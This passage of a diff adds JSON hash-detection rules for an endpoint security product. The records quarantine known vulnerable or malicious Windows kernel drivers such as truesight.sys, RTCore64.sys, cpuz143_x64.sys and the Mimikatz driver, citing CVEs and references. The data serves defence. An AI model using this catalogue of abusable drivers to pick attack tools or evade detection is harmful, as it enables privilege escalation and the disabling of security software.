"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153146Z", + "creation_date": "2026-03-23T11:45:31.153150Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153159Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6c59848c6671201b3838b69cb2947e3e7489c6c0bdd538a9609a76e980bfb3c7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5dff5fd9-6c94-5ee9-839f-acbc6c75ec7b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145254Z", + "creation_date": "2026-03-23T11:45:31.145256Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145261Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "80a4c175c06c9fb31d0e0d3f741e6bacde3fd9058f0b2f783ce0d66becc0a8b3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5e054251-f6ab-5724-a0fc-3a33094d97c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610993Z", + "creation_date": "2026-03-23T11:45:29.610995Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611000Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fd8d61102719afb0b8a230d9e8c372af3396bec4a6d72aada42a1f1d36187751", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5e18716e-d0d3-58ce-968d-c2a4d317e398", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607817Z", + "creation_date": "2026-03-23T11:45:29.607819Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607824Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bc13adeb6bf62b1e10ef41205ef92382e6c18d6a20669d288a0b11058e533d63", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5e314e51-8b55-5026-a4b3-e72f6ce58050", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145985Z", + "creation_date": "2026-03-23T11:45:31.145988Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145996Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"e0508471f1b7177ccf26fd663d135767a652a3fdccb545e4ef38f79ae034f245", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5e31698d-4bcd-58a8-8b7a-51a203abc31d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149934Z", + "creation_date": "2026-03-23T11:45:31.149936Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149941Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b20d8255ee1c2f18a64dd3754ce2503db010cb650f2eaa8135a0ad252ebcced", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5e3515ed-33ca-527c-87e9-9c265cc68523", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482186Z", + "creation_date": "2026-03-23T11:45:31.482190Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482200Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de80cadf7e24d0414d6d88922995a5fb62cc050b67dfc64f31452d72cfbb9fe4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5e3c796f-11e8-5a0f-877b-780c78f9d7dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807561Z", + "creation_date": "2026-03-23T11:45:31.807564Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807573Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eca625614fa812a3e2fb2eade15f87df9ba3cac5078b1bbf914bfa745fb977c6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5e4b6a3e-417c-5a65-96de-aec4831ab6ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460465Z", + "creation_date": "2026-03-23T11:45:30.460469Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460478Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "67e9d1f6f7ed58d86b025d3578cb7a3f3c389b9dd425b7f46bb1056e83bffc78", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5e5b5808-b6cc-5fd2-876c-0d08c80e5df5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606103Z", + "creation_date": "2026-03-23T11:45:29.606105Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606110Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "51e91dd108d974ae809e5fc23f6fbd16e13f672f86aa594dae4a5c4bc629b0b5", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5e6345cd-f671-505b-b7ac-94b766aaf87e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153684Z", + "creation_date": "2026-03-23T11:45:31.153686Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153691Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f76f5ac7ad8f077092b85ed16912b99e7a0eb91497aea292f61d1a97e07884ea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5e6772ef-b3c0-5d88-9f4f-24e60b50fc35", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836065Z", + "creation_date": "2026-03-23T11:45:30.836067Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836072Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "38bd451bc3a296a3e108f7ed83a014f345f7e8415015628bd3ec223d6270ca70", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5e71c5da-cd2b-55d9-a07f-c977be843837", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810794Z", + "creation_date": "2026-03-23T11:45:31.810797Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.810802Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd4108979f44c34a3c6ed06cc410117450fec087ecf77937e4fb588e26b73ed9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5e7e36d1-d152-5ce7-9da1-913e65016526", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144003Z", + "creation_date": "2026-03-23T11:45:31.144005Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144011Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6e2ba9f06829ee04a6d4b1653754e415ad39a01570919256df716c94e071f84d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5e816d24-4d20-53bb-855f-300bd55c448e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822255Z", + "creation_date": "2026-03-23T11:45:31.822257Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822263Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "10e36a55afb19c4a9611d8370225173c57e377fb0f237606072190679f85c99e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5e853c92-a543-557f-ad3b-c62cc50312f6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970297Z", + "creation_date": "2026-03-23T11:45:29.970299Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970304Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "d30f51bfd62695df96ba94cde14a7fae466b29ef45252c6ad19d57b4a87ff44e", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5e890d91-f163-5fad-9d09-a28bbc1373ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488027Z", + "creation_date": "2026-03-23T11:45:31.488029Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488034Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9da15be14ff7e1e78ff6d67649268a3d9fd117a04393f9ff972326ddd887257c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5ea38312-59e4-5549-b217-16878e7edfa7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142808Z", + "creation_date": "2026-03-23T11:45:32.142810Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142816Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "023d722cbbdd04e3db77de7e6e3cfeabcef21ba5b2f04c3f3a33691801dd45eb", + "comment": "Vulnerable ITM SYSTEM File Filter Driver (aka probmon.sys) [https://antonioparata.blogspot.com/2024/02/exploiting-vulnerable-minifilter-driver.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5eadf19d-24f4-52d0-997e-6a2492e56563", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621281Z", + "creation_date": "2026-03-23T11:45:29.621283Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621288Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b48a309ee0960da3caaaaf1e794e8c409993aeb3a2b64809f36b97aac8a1e62a", + "comment": "ASUSTeK vulnerable physmem driver (aka AsIO64.sys) [https://www.loldrivers.io/drivers/79692987-1dd0-41a0-a560-9a0441922e5a/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5eb06983-a32e-5265-af41-1208746544b0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816986Z", + "creation_date": "2026-03-23T11:45:31.816988Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816993Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4fde22ee85f60c67ad4c5ff15df2c7609ad24a44ad45144e06461f64c5149df5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5eb23368-f54a-5725-a0b8-8bd15528379b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492923Z", + "creation_date": "2026-03-23T11:45:31.492925Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492931Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "825fd4c37680a98cc1855795a921536d4450776c731c2a71ecf28deb9d6e8188", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5eb7e638-80e1-547e-9bae-4a14f277255d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615082Z", + "creation_date": "2026-03-23T11:45:29.615084Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615089Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e3936d3356573ce2e472495cd3ce769f49a613e453b010433dafce5ea498ddc2", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5eb96b6c-a649-51bc-b76f-2f616e4fe36b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144055Z", + "creation_date": "2026-03-23T11:45:32.144057Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144063Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "28b39c57628cb12ca1bf2f531055c7d57008be5fd424aa691ecb648efe5768dd", + "comment": "Malicious Kernel Driver (aka driver_c3d48ddd.sys) [https://www.loldrivers.io/drivers/f6c08b8a-1d25-4bf1-9d4f-5368c1f6cfe7/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5ebd7326-02b8-5c64-83e7-2aef25858e1f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836594Z", + "creation_date": "2026-03-23T11:45:30.836597Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836602Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8cd13f392fc66286c0866f583edb8df3273057fe7848e2679aae5222dd09254b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5ec7a5d0-8734-5b52-8c28-88af9bf496d5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829394Z", + "creation_date": "2026-03-23T11:45:30.829396Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829401Z", + 